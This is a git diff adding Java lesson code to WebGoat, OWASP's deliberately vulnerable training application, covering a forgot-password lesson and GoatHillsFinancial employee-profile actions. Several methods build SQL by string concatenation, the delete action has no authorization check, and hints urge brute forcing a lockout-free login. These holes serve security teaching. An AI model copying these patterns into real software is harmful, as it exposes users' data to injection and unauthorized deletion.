+				s.setMessage("Incorrect response for " + USERNAME_RESPONSE + ". Please try again!");
+				ec.addElement(doStage2(s));
+		    }
+		}
+		else if (STAGE == 1)
+		{
+		    username = s.getParser().getStringParameter(USERNAME, "");
+	
+		    if (USERS.containsKey(username))
+		    {
+				STAGE = 2;
+				USERNAME_RESPONSE = username;
+				ec.addElement(doStage2(s));
+		    }
+		    else
+		    {
+				if (username.length() > 0)
+				{
+					s.setMessage("Not a valid username. Please try again.");
+				}
+				ec.addElement(doStage1(s));
+		    }
+		}
+		else
+		{
+		    ec.addElement(doStage1(s));
+		    STAGE = 1;
+		}
+	
+		return ec;
+    }
+
+
+    /**
+     *  Gets the category attribute of the ForgotPassword object
+     *
+     * @return    The category value
+     */
+    protected Category getDefaultCategory()
+    {
+
+	return Category.AUTHENTICATION;
+    }
+
+
+    /**
+     *  Gets the hints attribute of the HelloScreen object
+     *
+     * @return    The hints value
+     */
+    public List<String> getHints(WebSession s)
+    {
+		List<String> hints = new ArrayList<String>();
+		
+		hints.add("There is no lock out policy in place, brute force your way!");
+		hints.add("Try using usernames you might encounter throughout WebGoat.");
+		hints.add("There are only so many possible colors, can you guess one?");
+		hints.add("The administrative account is \"admin\"");
+	
+		return hints;
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(15);
+
+
+    protected Integer getDefaultRanking()
+    {
+    	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the HelloScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+    	return ("Forgot Password");
+    }
+
+
+    public Element getCredits()
+    {
+    	return super.getCustomCredits("", ASPECT_LOGO);
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DefaultLessonAction.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DefaultLessonAction.java
new file mode 100644
index 000000000..32b4a2e3f
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DefaultLessonAction.java
@@ -0,0 +1,334 @@
+package org.owasp.webgoat.lessons.GoatHillsFinancial;
+
+import java.sql.PreparedStatement;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+
+import org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public abstract class DefaultLessonAction implements LessonAction
+{
+	// FIXME: We could parse this class name to get defaults for these fields.
+	private String lessonName;
+	private String actionName;
+	
+	private GoatHillsFinancial lesson;
+	
+	public DefaultLessonAction(GoatHillsFinancial lesson, String lessonName, String actionName)
+	{
+		this.lesson = lesson;
+		this.lessonName = lessonName;
+		this.actionName = actionName;
+	}
+
+	public void handleRequest( WebSession s )
+			throws ParameterNotFoundException, UnauthenticatedException, UnauthorizedException, ValidationException
+	{
+		getLesson().setCurrentAction(s, getActionName());
+
+		if (isAuthenticated(s))
+		{
+		}
+		else
+			throw new UnauthenticatedException();
+	}
+
+	public abstract String getNextPage(WebSession s);
+
+	public GoatHillsFinancial getLesson()
+	{
+		return lesson;
+	}
+
+	public String getLessonName()
+	{
+		return lessonName;
+	}
+
+	public String getActionName()
+	{
+		return actionName;
+	}
+	
+	public void setSessionAttribute(WebSession s, String name, Object value)
+	{
+		s.getRequest().getSession().setAttribute(name, value);
+	}
+	
+	public void setRequestAttribute(WebSession s, String name, Object value)
+	{
+		s.getRequest().setAttribute(name, value);
+	}
+	
+	public void removeSessionAttribute(WebSession s, String name)
+	{
+		s.getRequest().getSession().removeAttribute(name);		
+	}
+	
+	protected String getSessionAttribute(WebSession s, String name) throws ParameterNotFoundException
+	{
+		String value = (String) s.getRequest().getSession().getAttribute(name);
+		if (value == null)
+		{
+			throw new ParameterNotFoundException();
+		}
+		
+		return value;
+	}
+	
+	protected boolean getBooleanSessionAttribute(WebSession s, String name) throws ParameterNotFoundException
+	{
+		boolean value = false;
+		
+		Object attribute = s.getRequest().getSession().getAttribute(name);
+		if (attribute == null)
+		{
+			throw new ParameterNotFoundException();
+		}
+		else
+		{
+			//System.out.println("Attribute " + name + " is of type " + s.getRequest().getSession().getAttribute(name).getClass().getName());
+			//System.out.println("Attribute value: " + s.getRequest().getSession().getAttribute(name));
+			value = ((Boolean) attribute).booleanValue();
+		}
+		return value;
+	}
+	
+	protected int getIntSessionAttribute(WebSession s, String name) throws ParameterNotFoundException
+	{
+		int value = -1;
+		String ss = (String) s.getRequest().getSession().getAttribute(name);
+		if (ss == null)
+		{
+			throw new ParameterNotFoundException();
+		}
+		else
+		{
+			try
+			{
+				value = Integer.parseInt(ss);
+			}
+			catch (NumberFormatException nfe)
+			{
+			}
+		}
+		
+		return value;
+	}
+	
+	protected String getRequestAttribute(WebSession s, String name) throws ParameterNotFoundException
+	{
+		String value = (String) s.getRequest().getAttribute(name);
+		if (value == null)
+		{
+			throw new ParameterNotFoundException();
+		}
+		
+		return value;
+	}
+	
+	protected int getIntRequestAttribute(WebSession s, String name) throws ParameterNotFoundException
+	{
+		int value = -1;
+		String ss = (String) s.getRequest().getAttribute(name);
+		if (ss == null)
+		{
+			throw new ParameterNotFoundException();
+		}
+		else
+		{
+			try
+			{
+				value = Integer.parseInt(ss);
+			}
+			catch (NumberFormatException nfe)
+			{
+			}
+		}
+		
+		return value;
+	}
+	
+	public int getUserId(WebSession s) throws ParameterNotFoundException
+	{
+		return getIntSessionAttribute(s, getLessonName() + "." + RoleBasedAccessControl.USER_ID);
+	}
+	
+	public String getUserName(WebSession s) throws ParameterNotFoundException
+	{
+		String name = null;
+		
+		int employeeId = getUserId(s);
+		try
+		{
+			String query = "SELECT first_name FROM employee WHERE userid = " + employeeId;
+			
+			try
+			{
+				Statement answer_statement = WebSession.getConnection(s).createStatement( ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
+				ResultSet answer_results = answer_statement.executeQuery( query );
+				if (answer_results.next())
+					name = answer_results.getString("first_name");
+			}
+			catch ( SQLException sqle )
+			{
+				s.setMessage( "Error getting user name" );
+				sqle.printStackTrace();
+			}
+		}
+		catch ( Exception e )
+		{
+			s.setMessage( "Error getting user name" );
+			e.printStackTrace();
+		}
+
+		return name;
+	}
+	
+	public boolean requiresAuthentication()
+	{
+		// Default to true
+		return true;
+	}
+	
+	public boolean isAuthenticated(WebSession s)
+	{
+		boolean authenticated = false;
+		
+		try
+		{
+			authenticated = getBooleanSessionAttribute(s, getLessonName() + ".isAuthenticated");
+		}
+		catch (ParameterNotFoundException e)
+		{	
+		}
+		
+		return authenticated;
+	}
+	
+	public boolean isAuthorized(WebSession s, int employeeId, String functionId)
+	{
+		String employer_id = (String)s.getRequest().getSession().getAttribute(getLessonName() + "." + RoleBasedAccessControl.USER_ID);
+		//System.out.println("Authorizing " + employeeId + " for use of function: " + functionId + " having USER_ID = " + employer_id );
+		boolean authorized = false;
+		
+		try
+		{
+			String query = "SELECT * FROM auth WHERE auth.role in (SELECT roles.role FROM roles WHERE userid = " + employeeId + ") and functionid = '" + functionId + "'";
+			
+			try
+			{
+				Statement answer_statement = WebSession.getConnection(s).createStatement( ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
+				ResultSet answer_results = answer_statement.executeQuery( query );
+				authorized = answer_results.first();
+				
+				/* User is validated for function, but can the user perform that function on the specified user? */
+				if(authorized)
+				{
+					authorized = isAuthorizedForEmployee(s, Integer.parseInt(employer_id), employeeId);
+				}
+			}
+			catch ( SQLException sqle )
+			{
+				s.setMessage( "Error authorizing" );
+				sqle.printStackTrace();
+			}
+		}
+		catch ( Exception e )
+		{
+			s.setMessage( "Error authorizing" );
+			e.printStackTrace();
+		}
+				
+		//System.out.println("Authorized? " + authorized);
+		return authorized;
+	}
+	
+	public boolean isAuthorizedForEmployee(WebSession s, int userId, int employeeId)
+	{
+		//System.out.println("Authorizing " + userId + " for access to employee: " + employeeId);
+		boolean authorized = false;
+		
+		try
+		{
+			String query = "SELECT * FROM ownership WHERE employer_id = ? AND employee_id = ?";
+			
+			try
+			{
+				
+				PreparedStatement answer_statement = WebSession.getConnection(s).prepareStatement( query, 
+						ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
+				answer_statement.setInt(1, userId);
+				answer_statement.setInt(2, employeeId);
+				ResultSet answer_results = answer_statement.executeQuery();
+				authorized = answer_results.first();
+			}
+			catch ( SQLException sqle )
+			{
+				s.setMessage( "Error authorizing" );
+				sqle.printStackTrace();
+			}
+		}
+		catch ( Exception e )
+		{
+			s.setMessage( "Error authorizing" );
+			e.printStackTrace();
+		}
+		
+		return authorized;
+	}
+	
+	protected void setStage(WebSession s, String stage)
+	{
+		getLesson().setStage(s, stage);
+	}
+
+	protected void setStageComplete(WebSession s, String stage) {
+		getLesson().setStageComplete(s, stage);
+	}
+	
+	protected String getStage(WebSession s)
+	{
+		return getLesson().getStage(s);
+	}
+
+	public String toString()
+	{
+		return getActionName();
+	}
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java
new file mode 100755
index 000000000..67e8a8a2e
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java
@@ -0,0 +1,122 @@
+package org.owasp.webgoat.lessons.GoatHillsFinancial;
+
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class DeleteProfile extends DefaultLessonAction
+{
+
+    private LessonAction chainedAction;
+
+    public DeleteProfile(GoatHillsFinancial lesson, String lessonName,
+	    String actionName, LessonAction chainedAction)
+    {
+	super(lesson, lessonName, actionName);
+	this.chainedAction = chainedAction;
+    }
+
+    public void handleRequest(WebSession s) throws ParameterNotFoundException,
+	    UnauthenticatedException, UnauthorizedException,
+	    ValidationException
+    {
+	getLesson().setCurrentAction(s, getActionName());
+
+	int userId = getIntSessionAttribute(s, getLessonName() + "."
+		+ GoatHillsFinancial.USER_ID);
+	int employeeId = s.getParser().getIntParameter(
+		GoatHillsFinancial.EMPLOYEE_ID);
+
+	if (isAuthenticated(s))
+	{
+	    deleteEmployeeProfile(s, userId, employeeId);
+
+	    try
+	    {
+		chainedAction.handleRequest(s);
+	    }
+	    catch (UnauthenticatedException ue1)
+	    {
+		System.out.println("Internal server error");
+		ue1.printStackTrace();
+	    }
+	    catch (UnauthorizedException ue2)
+	    {
+		System.out.println("Internal server error");
+		ue2.printStackTrace();
+	    }
+	}
+	else
+	    throw new UnauthenticatedException();
+
+    }
+
+    public String getNextPage(WebSession s)
+    {
+	return GoatHillsFinancial.LISTSTAFF_ACTION;
+    }
+
+    public void deleteEmployeeProfile(WebSession s, int userId, int employeeId)
+	    throws UnauthorizedException
+    {
+	try
+	{
+	    // Note: The password field is ONLY set by ChangePassword
+	    String query = "DELETE FROM employee WHERE userid = " + employeeId;
+	    //System.out.println("Query:  " + query);
+	    try
+	    {
+		Statement statement = WebSession.getConnection(s)
+			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		statement.executeUpdate(query);
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error deleting employee profile");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error deleting employee profile");
+	    e.printStackTrace();
+	}
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java
new file mode 100755
index 000000000..287799439
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java
@@ -0,0 +1,132 @@
+package org.owasp.webgoat.lessons.GoatHillsFinancial;
+
+import java.sql.PreparedStatement;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+
+import org.owasp.webgoat.session.Employee;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class EditProfile extends DefaultLessonAction
+{
+
+    public EditProfile(GoatHillsFinancial lesson, String lessonName,
+	    String actionName)
+    {
+	super(lesson, lessonName, actionName);
+    }
+
+    public void handleRequest(WebSession s) throws ParameterNotFoundException,
+	    UnauthenticatedException, UnauthorizedException
+    {
+	getLesson().setCurrentAction(s, getActionName());
+
+	if (isAuthenticated(s))
+	{
+	    int userId = getUserId(s);
+	    int employeeId = s.getParser().getIntParameter(
+		    GoatHillsFinancial.EMPLOYEE_ID);
+
+	    Employee employee = getEmployeeProfile(s, userId, employeeId);
+	    setSessionAttribute(s, getLessonName() + "."
+		    + GoatHillsFinancial.EMPLOYEE_ATTRIBUTE_KEY, employee);
+	}
+	else
+	    throw new UnauthenticatedException();
+    }
+
+    public String getNextPage(WebSession s)
+    {
+	return GoatHillsFinancial.EDITPROFILE_ACTION;
+    }
+
+    public Employee getEmployeeProfile(WebSession s, int userId,
+	    int subjectUserId) throws UnauthorizedException
+    {
+	Employee profile = null;
+
+	// Query the database for the profile data of the given employee
+	try
+	{
+	    String query = "SELECT * FROM employee WHERE userid = ?";
+
+	    try
+	    {
+		PreparedStatement answer_statement = WebSession
+			.getConnection(s).prepareStatement(query,
+				ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		answer_statement.setInt(1, subjectUserId);
+		ResultSet answer_results = answer_statement.executeQuery();
+		if (answer_results.next())
+		{
+		    // Note: Do NOT get the password field.
+		    profile = new Employee(answer_results.getInt("userid"),
+			    answer_results.getString("first_name"),
+			    answer_results.getString("last_name"),
+			    answer_results.getString("ssn"), answer_results
+				    .getString("title"), answer_results
+				    .getString("phone"), answer_results
+				    .getString("address1"), answer_results
+				    .getString("address2"), answer_results
+				    .getInt("manager"), answer_results
+				    .getString("start_date"), answer_results
+				    .getInt("salary"), answer_results
+				    .getString("ccn"), answer_results
+				    .getInt("ccn_limit"), answer_results
+				    .getString("disciplined_date"),
+			    answer_results.getString("disciplined_notes"),
+			    answer_results.getString("personal_description"));
+		    /*					System.out.println("Retrieved employee from db: " + 
+		     profile.getFirstName() + " " + profile.getLastName() + 
+		     " (" + profile.getId() + ")");
+		     */}
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error getting employee profile");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error getting employee profile");
+	    e.printStackTrace();
+	}
+
+	return profile;
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java
new file mode 100755
index 000000000..e8cd6c8c4
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java
@@ -0,0 +1,190 @@
+package org.owasp.webgoat.lessons.GoatHillsFinancial;
+
+import java.sql.PreparedStatement;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+
+import org.owasp.webgoat.session.Employee;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class FindProfile extends DefaultLessonAction
+{
+
+    private LessonAction chainedAction;
+
+
+    public FindProfile(GoatHillsFinancial lesson, String lessonName,
+	    String actionName, LessonAction chainedAction)
+    {
+	super(lesson, lessonName, actionName);
+	this.chainedAction = chainedAction;
+    }
+
+
+    public void handleRequest(WebSession s) throws ParameterNotFoundException,
+	    UnauthenticatedException, UnauthorizedException,
+	    ValidationException
+    {
+	if (isAuthenticated(s))
+	{
+	    int userId = getIntSessionAttribute(s, getLessonName() + "."
+		    + GoatHillsFinancial.USER_ID);
+
+	    String pattern = s.getParser().getRawParameter(
+		    GoatHillsFinancial.SEARCHNAME);
+
+	    findEmployeeProfile(s, userId, pattern);
+
+	    // Execute the chained Action if the employee was found.
+	    if (foundEmployee(s))
+	    {
+		try
+		{
+		    chainedAction.handleRequest(s);
+		}
+		catch (UnauthenticatedException ue1)
+		{
+		    System.out.println("Internal server error");
+		    ue1.printStackTrace();
+		}
+		catch (UnauthorizedException ue2)
+		{
+		    System.out.println("Internal server error");
+		    ue2.printStackTrace();
+		}
+	    }
+	}
+	else
+	    throw new UnauthenticatedException();
+    }
+
+
+    public String getNextPage(WebSession s)
+    {
+	String page = GoatHillsFinancial.SEARCHSTAFF_ACTION;
+
+	if (foundEmployee(s))
+	    page = GoatHillsFinancial.VIEWPROFILE_ACTION;
+
+	return page;
+    }
+
+
+    private boolean foundEmployee(WebSession s)
+    {
+	boolean found = false;
+	try
+	{
+	    getIntRequestAttribute(s, getLessonName() + "."
+		    + GoatHillsFinancial.EMPLOYEE_ID);
+	    found = true;
+	}
+	catch (ParameterNotFoundException e)
+	{}
+
+	return found;
+    }
+
+
+    public Employee findEmployeeProfile(WebSession s, int userId, String pattern)
+	    throws UnauthorizedException
+    {
+	Employee profile = null;
+	// Clear any residual employee id's in the session now.
+	removeSessionAttribute(s, getLessonName() + "."
+		+ GoatHillsFinancial.EMPLOYEE_ID);
+
+	// Query the database for the profile data of the given employee
+	try
+	{
+	    String query = "SELECT * FROM employee WHERE first_name LIKE ? OR last_name LIKE ?";
+
+	    try
+	    {
+		PreparedStatement answer_statement = WebSession
+			.getConnection(s).prepareStatement(query,
+				ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		answer_statement.setString(1, "%" + pattern + "%");
+		answer_statement.setString(2, "%" + pattern + "%");
+		ResultSet answer_results = answer_statement.executeQuery();
+
+		// Just use the first hit.
+		if (answer_results.next())
+		{
+		    int id = answer_results.getInt("userid");
+		    // Note: Do NOT get the password field.
+		    profile = new Employee(id, answer_results
+			    .getString("first_name"), answer_results
+			    .getString("last_name"), answer_results
+			    .getString("ssn"), answer_results
+			    .getString("title"), answer_results
+			    .getString("phone"), answer_results
+			    .getString("address1"), answer_results
+			    .getString("address2"), answer_results
+			    .getInt("manager"), answer_results
+			    .getString("start_date"), answer_results
+			    .getInt("salary"), answer_results.getString("ccn"),
+			    answer_results.getInt("ccn_limit"), answer_results
+				    .getString("disciplined_date"),
+			    answer_results.getString("disciplined_notes"),
+			    answer_results.getString("personal_description"));
+
+		    /*					System.out.println("Retrieved employee from db: " + 
+		     profile.getFirstName() + " " + profile.getLastName() + 
+		     " (" + profile.getId() + ")");
+		     */
+		    setRequestAttribute(s, getLessonName() + "."
+			    + GoatHillsFinancial.EMPLOYEE_ID, Integer
+			    .toString(id));
+		}
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error finding employee profile");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error finding employee profile");
+	    e.printStackTrace();
+	}
+
+	return profile;
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java
new file mode 100755
index 000000000..44ba5f481
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java
@@ -0,0 +1,332 @@
+package org.owasp.webgoat.lessons.GoatHillsFinancial;
+
+import java.util.ArrayList;
+import java.util.Hashtable;
+import java.util.List;
+import java.util.Map;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.IMG;
+import org.owasp.webgoat.lessons.RandomLessonAdapter;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class GoatHillsFinancial extends RandomLessonAdapter
+{
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+
+    public final static String DESCRIPTION = "description";
+
+    public final static String DISCIPLINARY_DATE = "disciplinaryDate";
+
+    public final static String DISCIPLINARY_NOTES = "disciplinaryNotes";
+
+    public final static String CCN_LIMIT = "ccnLimit";
+
+    public final static String CCN = "ccn";
+
+    public final static String SALARY = "salary";
+
+    public final static String START_DATE = "startDate";
+
+    public final static String MANAGER = "manager";
+
+    public final static String ADDRESS1 = "address1";
+
+    public final static String ADDRESS2 = "address2";
+
+    public final static String PHONE_NUMBER = "phoneNumber";
+
+    public final static String TITLE = "title";
+
+    public final static String SSN = "ssn";
+
+    public final static String LAST_NAME = "lastName";
+
+    public final static String FIRST_NAME = "firstName";
+
+    public final static String PASSWORD = "password";
+
+    public final static String EMPLOYEE_ID = "employee_id";
+
+    public final static String USER_ID = "user_id";
+
+    public final static String SEARCHNAME = "search_name";
+
+    public final static String SEARCHRESULT_ATTRIBUTE_KEY = "SearchResult";
+
+    public final static String EMPLOYEE_ATTRIBUTE_KEY = "Employee";
+
+    public final static String STAFF_ATTRIBUTE_KEY = "Staff";
+
+    public final static String LOGIN_ACTION = "Login";
+
+    public final static String LOGOUT_ACTION = "Logout";
+
+    public final static String LISTSTAFF_ACTION = "ListStaff";
+
+    public final static String SEARCHSTAFF_ACTION = "SearchStaff";
+
+    public final static String FINDPROFILE_ACTION = "FindProfile";
+
+    public final static String VIEWPROFILE_ACTION = "ViewProfile";
+
+    public final static String EDITPROFILE_ACTION = "EditProfile";
+
+    public final static String UPDATEPROFILE_ACTION = "UpdateProfile";
+
+    public final static String CREATEPROFILE_ACTION = "CreateProfile";
+
+    public final static String DELETEPROFILE_ACTION = "DeleteProfile";
+
+    public final static String ERROR_ACTION = "error";
+
+    private final static Integer DEFAULT_RANKING = new Integer(125);
+
+    private Map<String, LessonAction> lessonFunctions = new Hashtable<String, LessonAction>();
+
+    public GoatHillsFinancial()
+    {
+	String myClassName = parseClassName(this.getClass().getName());
+	registerActions(myClassName);
+    }
+
+    protected void registerActions(String className) {
+    	registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
+    	registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
+    	registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
+    	registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
+    	registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
+
+    	// These actions are special in that they chain to other actions.
+    	registerAction(new Login(this, className, LOGIN_ACTION,
+    		getAction(LISTSTAFF_ACTION)));
+    	registerAction(new Logout(this, className, LOGOUT_ACTION,
+    		getAction(LOGIN_ACTION)));
+    	registerAction(new FindProfile(this, className, FINDPROFILE_ACTION,
+    		getAction(VIEWPROFILE_ACTION)));
+    	registerAction(new UpdateProfile(this, className,
+    		UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
+    	registerAction(new DeleteProfile(this, className,
+    		DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
+    }
+    
+    protected final String parseClassName(String fqcn)
+    {
+	String className = fqcn;
+
+	int lastDotIndex = fqcn.lastIndexOf('.');
+	if (lastDotIndex > -1)
+	    className = fqcn.substring(lastDotIndex + 1);
+
+	return className;
+    }
+
+    protected void registerAction(LessonAction action)
+    {
+	lessonFunctions.put(action.getActionName(), action);
+    }
+
+    public String[] getStages() {
+    	return new String[] {};
+    }
+    
+    protected List<String> getHints(WebSession s)
+    {
+	return new ArrayList<String>();
+    }
+
+    public String getInstructions(WebSession s)
+    {
+	return "";
+    }
+
+    protected LessonAction getAction(String actionName)
+    {
+	return lessonFunctions.get(actionName);
+    }
+
+    public void handleRequest(WebSession s)
+    {
+	if (s.getLessonSession(this) == null)
+	    s.openLessonSession(this);
+
+	String requestedActionName = null;
+	try
+	{
+	    requestedActionName = s.getParser().getStringParameter("action");
+	}
+	catch (ParameterNotFoundException pnfe)
+	{
+	    // Let them eat login page.
+	    requestedActionName = LOGIN_ACTION;
+	}
+
+	try
+	{
+	    LessonAction action = getAction(requestedActionName);
+	    if (action == null)
+	    {
+			setCurrentAction(s, ERROR_ACTION);
+	    } else
+	    {
